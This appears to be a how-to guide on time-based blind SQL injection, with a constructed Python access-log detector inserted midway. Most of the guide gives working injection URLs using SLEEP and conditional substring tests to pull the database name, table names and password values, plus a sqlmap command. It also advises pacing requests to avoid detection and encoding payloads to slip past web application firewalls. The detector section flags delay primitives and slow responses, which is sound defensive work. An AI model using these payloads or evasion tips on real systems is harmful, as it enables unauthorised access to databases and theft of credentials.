TL;DR
Blind SQL injection happens when you can’t see the results of your query directly, but you can still tell whether an injected condition is true or false from how the server behaves, most usefully from how long it takes to respond. Heavy queries are a key sign: they mean the database is working harder than usual. This guide shows you how to find those slow queries and use them to extract information.
Understanding Blind SQL Injection
With blind SQL injection, instead of getting data back directly (as in regular SQL injection), you send requests that cause different behaviours on the server. The most common behaviour is a change in response time: if the injected condition is true, the server takes longer to respond; if it is false, the response comes back quickly.
Identifying Heavy Queries
- Initial Probe: Start with a simple request that you *know* will be true. For example, if the application uses an ID parameter:
http://example.com/product?id=1
Record the response time.
- Introduce a Time Delay: Add a delay to your query using SQL functions like SLEEP() (MySQL), pg_sleep() (PostgreSQL) or WAITFOR DELAY '0:00:5' (SQL Server). Try something like:
http://example.com/product?id=1 AND SLEEP(5)
If the response time increases by approximately 5 seconds, you’ve confirmed that SQL injection is possible and the database executes the injected SQL.
- Boolean-Based Injection: Use conditions that evaluate to true or false. For example:
http://example.com/product?id=1 AND 'a'='a'
This should be similar in response time to the initial probe.
http://example.com/product?id=1 AND 'a'!='a'
This *should* be faster, as it’s an impossible condition.
- Time-Based Injection: This is where you really look for heavy queries. Use a time delay based on a condition:
http://example.com/product?id=1 AND IF(substring(database(), 1, 1) = 'a', SLEEP(5), 0)
This query sleeps for 5 seconds if the first letter of the database name is ‘a’. If it’s not ‘a’, there’s no delay.
- Automate Querying: Manually testing each character is slow. Use tools like:
- sqlmap: A powerful automated SQL injection tool. It can detect and exploit various types of SQL injection vulnerabilities, including blind injections.
sqlmap -u "http://example.com/product?id=1" --dbs
- Burp Suite Intruder: Configure Burp to send a series of requests with different payloads for the id parameter, measuring response times.
Interpreting Response Times
- Significant Delays: A delay consistently around your specified sleep time (e.g., 5 seconds) indicates the condition is true.
- Small Variations: Ignore minor variations in response time caused by network fluctuations or server load. Focus on consistent, noticeable differences.
- False Positives: Be aware of caching. Clear your browser cache and use a different session for testing to avoid misleading results.
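The same two signals this section describes, a request that carries a delay primitive and a response far slower than the baseline for that path, are what a defender looks for in access logs. This is an added example, not part of the original guide; it assumes a simplified log format (method, target, status, seconds taken) with constructed sample lines, and uses the median of unflagged requests per path as the baseline.

```python
import re
from statistics import median
from urllib.parse import parse_qs

# Constructed sample access-log lines (not from any real server): method, target, status, seconds taken.
SAMPLE_LOG = """\
GET /product?id=1 200 0.041
GET /product?id=1%20AND%20SLEEP(5) 200 5.063
GET /product?id=1%20AND%20'a'='a' 200 0.044
GET /product?id=1%20AND%20IF(substring(database(),1,1)='a',SLEEP(5),0) 200 0.046
GET /product?id=1%20AND%20SLEEP%25285%2529 200 5.058
GET /search?q=shoes 200 0.210
GET /product?id=3 200 0.038
"""
LINE_RE = re.compile(r"^\S+ (?P<target>\S+) \d{3} (?P<secs>\d+(?:\.\d+)?)$")
# Delay primitives named in the guide, matched case-insensitively on URL-decoded parameter values.
TIMING_RE = re.compile(r"\b(?:SLEEP|pg_sleep)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)

def find_timing_payload(params):
    """Return the first parameter name whose decoded value carries a delay primitive, else None."""
    for name, values in params.items():
        if any(TIMING_RE.search(v) for v in values):
            return name
    return None

def parse_line(line):
    """Split one log line into path, response time and the signature verdict; None if malformed."""
    if not (m := LINE_RE.match(line)):
        return None
    path, _, query = m["target"].partition("?")
    params = parse_qs(query, keep_blank_values=True)  # one round of URL decoding
    return {"line": line, "path": path, "secs": float(m["secs"]),
            "payload_param": find_timing_payload(params)}

def analyse(log_text, delay_threshold=3.0):
    """Flag requests carrying a delay primitive, and unflagged requests far slower than the per-path median."""
    rows = [r for r in map(parse_line, log_text.splitlines()) if r]
    clean = {}
    for r in rows:
        if r["payload_param"] is None:
            clean.setdefault(r["path"], []).append(r["secs"])
    baseline = {p: median(v) for p, v in clean.items()}  # median shrugs off a few slow outliers
    findings = []
    for r in rows:
        if r["payload_param"] is not None:
            findings.append({"line": r["line"], "kind": "signature", "detail": r["payload_param"]})
        elif r["secs"] - baseline[r["path"]] >= delay_threshold:
            findings.append({"line": r["line"], "kind": "timing",
                             "detail": f"{r['secs']:.2f}s vs {baseline[r['path']]:.2f}s baseline"})
    return findings
```

The double-encoded sample line slips past the signature after a single decode but is still caught by the timing baseline; decoding parameter values a second time before matching would surface it by signature as well.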
Extracting Information
- Database Name: Start with the database name, then table names, column names, and finally data.
http://example.com/product?id=1 AND IF(substring(database(), 1, 1) = 'a', SLEEP(5), 0)
- Table Names: Once you know the database name, test the table name one character at a time (the comparison is against a single character, so compare with 'u', not the whole name 'users'):
http://example.com/product?id=1 AND IF(substring((SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' LIMIT 0, 1), 1, 1) = 'u', SLEEP(5), 0)
- Column Names: Repeat the process for column names within each table.
- Data Extraction: Finally, extract data from specific columns:
http://example.com/product?id=1 AND IF(substring((SELECT password FROM users LIMIT 0, 1), 1, 1) = 'a', SLEEP(5), 0)
Important Considerations
- Rate Limiting: Be careful not to overload the server with too many requests. Implement delays between queries to avoid detection and denial-of-service issues.
- Error Handling: The application might have error handling that masks SQL injection attempts. Look for subtle differences in error messages or page content.
- WAFs (Web Application Firewalls): WAFs can block common SQL injection payloads. Try different encoding techniques and evasion methods.